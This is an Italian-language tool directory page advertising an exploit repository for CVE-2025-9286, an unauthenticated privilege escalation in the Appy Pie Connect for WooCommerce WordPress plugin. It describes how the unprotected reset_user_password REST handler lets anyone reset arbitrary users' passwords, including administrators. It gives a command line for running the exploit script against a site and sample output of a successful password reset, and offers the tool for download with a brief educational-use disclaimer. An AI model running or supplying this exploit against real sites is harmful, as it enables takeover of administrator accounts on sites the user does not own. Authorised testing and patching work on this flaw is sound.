Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - Mancanza di autorizzazione per l'escalation di privilegi non autenticata | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-9286
Escalation di PrivilegiAttacchi alle PasswordExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Mancanza di autorizzazione per l'escalation di privilegi non autenticata

Vedi Repository
10 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Autorizzazione mancante che consente l'Escalation dei privilegi non autenticata

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - Autorizzazione mancante che consente l'Escalation dei privilegi non autenticata tramite reset_user_password

📝 Descrizione

Il plugin Appy Pie Connect for WooCommerce per WordPress è vulnerabile all'Escalation dei privilegi a causa della mancata autorizzazione all'interno del gestore REST reset_user_password() in tutte le versioni fino alla 1.1.2 inclusa.
Ciò consente a utenti non autenticati di reimpostare la password di utenti arbitrari, inclusi gli amministratori, ottenendo così accesso amministrativo.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Critico)

💻 Script di Exploit

Il seguente exploit può essere utilizzato per sfruttare CVE-2025-9286 contro siti WordPress che eseguono la versione vulnerabile del plugin.

Nome dello script: CVE-2025-9286.py

⚙️ Utilizzo

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Output di Esempio (Exploit Riuscito)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 Contatti e Community

  • 📨 Telegram: @Kxploit
  • 📡 Canale Telegram: @KNxploited

⚠️ Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati.
L'uso non autorizzato contro sistemi senza un permesso esplicito è illegale.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


Di: Khaled Alenazi (Nxploited)

Scarica lo strumento